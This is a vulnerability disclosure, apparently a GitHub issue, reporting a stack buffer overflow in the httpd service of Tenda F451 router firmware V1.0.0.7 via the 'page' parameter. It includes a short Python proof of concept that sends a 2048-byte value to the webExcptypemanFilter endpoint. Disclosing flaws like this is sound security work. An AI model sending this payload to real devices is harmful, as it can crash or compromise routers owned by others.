Skip to content

The fromwebExcptypemanFilter function in Tenda's F451_kfw_V1.0.0.7_cn_svn7958 product has a buffer overflow #25

@Jimi-Lab

Description

@Jimi-Lab

Information

Vendor: Tenda
Product: F451_kfw_V1.0.0.7_cn_svn7958
Version: V1.0.0.7
Vulnerability: buffer overflow
Firmware Download: https://www.tenda.com.cn/material/show/1597
Author: Xianmao Ji

Descriptions

We found an overflow vulnerability in httpd :
In fromwebExcptypemanFilter function,it reads in a user-provided parameter page

Image

And the variable v6 is passed to the sprintf function without any length check, which may overflow the stack-based buffer s.

Image

As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution.

Proof of Concept (POC)

import requests
url = "http://127.0.0.1/goform/webExcptypemanFilter"
payload = {
'page':b'a'*2048
}
res = requests.post(url=url,data=payload)

Overcome

Image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions